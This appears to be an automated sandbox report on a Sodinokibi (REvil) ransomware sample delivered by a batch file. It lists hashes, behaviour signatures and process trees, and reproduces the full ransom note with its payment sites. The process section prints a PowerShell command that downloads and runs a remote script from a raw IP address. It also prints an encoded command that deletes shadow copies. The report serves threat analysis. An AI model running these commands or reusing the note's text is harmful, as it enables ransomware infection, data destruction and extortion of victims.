Analysis

  • max time kernel
    124s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    05-03-2020 03:10

General

  • Target

    4HwraGxu.bat

  • Size

    196B

  • MD5

    94f125fc020eddcb4d532de46bae7e6f

  • SHA1

    9a82eeac0dde9462f567e745ffe97b821ee717d6

  • SHA256

    ce85bc90b8156bbafb9f66b7673730dc456ac31b96a6b2a44a1e2905ed49dd16

  • SHA512

    51f5b3338698456e0d3c67d56dc18f534ba4ebda6bf1aa4f0cf2094431abca7d1aafa9df4ab6b9f76c47e45eb122b33088e5fefac658be80f2749f73fdf90ee4

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs

  • ps1.dropper

    http://185.103.242.78/pastes/4HwraGxu

Extracted

  • Path

    C:\mp62m85-readme.txt

  • Family

    sodinokibi

  • Ransom Note

    ---=== Welcome. Again. ===---

    [+] Whats Happen? [+]

    Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension mp62m85. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

    [+] What guarantees? [+]

    Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

    [+] How to get access on website? [+]

    You have two ways:

    1) [Recommended] Using a TOR browser!
       a) Download and install TOR browser from this site: https://torproject.org/
       b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5604F8BF38983AB7

    2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
       a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
       b) Open our secondary website: http://decryptor.cc/5604F8BF38983AB7

    Warning: secondary website can be blocked, thats why first variant much better and more available.

    When you open our website, put the following data in the input form:

    Key: a4P8itYCLx0uF3GOKi26c/xCaUIfzxzWHWiaqRaTzXxJhrecp0ggfel5qER8YUto 8bUDeqBU33gaHBdqzY8VYG/gpD7BlPBey+eY1S9DcOufoTFlYXcDpn+WHZwsdQZa f4Opucvo036/jAAXMPqR7Nq3G0v8n04Dngutcb6oSwa6rrK+8deeRFu/tD2UhYPj 6vEHb5VkLDTnjHcs7NXtdX8TfhomdhgJ/rPe+qN35plET5Ro1HmajvUsoMNtF6Fg suUroDUkTg4s930pxTYKY63rKdMivbcZcydHA3CyYa5xbQAx/WZkYVZ9X4cT0Ct3 gKNz0+zThxrQ9I36yGnS7/bw4c15FvhANLyXNtD0kWDYMIM7HpRi31Fq4NMbfS+a /wq99526MxoSaPtw4ngYRdvSORqhA5p903baLEwPrzr0qRz0pFBXVYRdI38BCgL1 zSVCrMwd11yyic2VXnQ1bu8UupxshgK611TifCN0MJIKUU9gYUw4UxLwyCWNPS1y phKbDGyWs4cc8K/I85tbSXwoVsynZDtgg0MKXtysPZ7ZT/aMs5CkW9PM58wuMIbe KlC5yThh7w4098V+BdWC3A0H5sdUvu+SKFR4FkiyTMkd7t5TwLdMHHq8FlHYY68L IzTW3n+CPzD5SrFaePFwnWccCmLMZK4+QjJxhpm3nmdLjdvoL459eIsV/8SHT7Fo gfXnEm4EJerHdnseZEgeV2M6LpYrNNrn32S7KlTX0OoQfAcftfKZ5PagVTkP9DYk ztFHe5RJYSE0bxS6NbY9ZIqblIcrnxn5ao2RzNQwDayQfbKJNCmJsGYINtJ/AIe5 EOxaq4cuPSxoKmeyQb6HdjDbqPnWag9oob5dawFA9sbyncMHPe8OH8LPcmatDUdz iCSrq2a2Kkq1dURkB7yykV57DR+6kZrR0Skj5moCl3gMJ7cTrMafZooJ8izmRU7w wd02aEo201/theKjN69/HDTzuF6082g58aefKNgU9tahv66hCn/Sw+qAhkD0wdKu 7PilSzDJTkreQ/BCPdLXNAk5VeD2FO9GJSC4GmyTGLgxXDOonlVtAk8FLufoiMdx n3fsZgrEuV6pZEsoL5aM/IEPcfUR9Pb4gfk9iFKSu5d7Eumuib8iUA4G7OSTE3Up c33F9pB+gYe3pwsUQyTlfdRtLnwqi+rnl7LbzW7m7uUy7irz8HLf0LlJu2i7iOD2 9YjNTahC/MhaBoqMK23SGQ/aGTon3VesUrOXWnK9pKbEqg0wO8gPQjl99vOFrbIl QDlnX0LEL+eTRPfSpD46QEmlMIAU4ujOdir8aJWahpL5MQ==

    -----------------------------------------------------------------------------------------

    !!! DANGER !!!
    DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
    !!! !!! !!!
    ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
    !!! !!! !!!

  • URLs

    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5604F8BF38983AB7

    http://decryptor.cc/5604F8BF38983AB7

Signatures

  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Blacklisted process makes network request 132 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\4HwraGxu.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1848
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4HwraGxu');Invoke-MRESRVFEKYADT;Start-Sleep -s 10000"
      2⤵
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Discovering connected drives
      PID:1872
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:1972
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1396

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms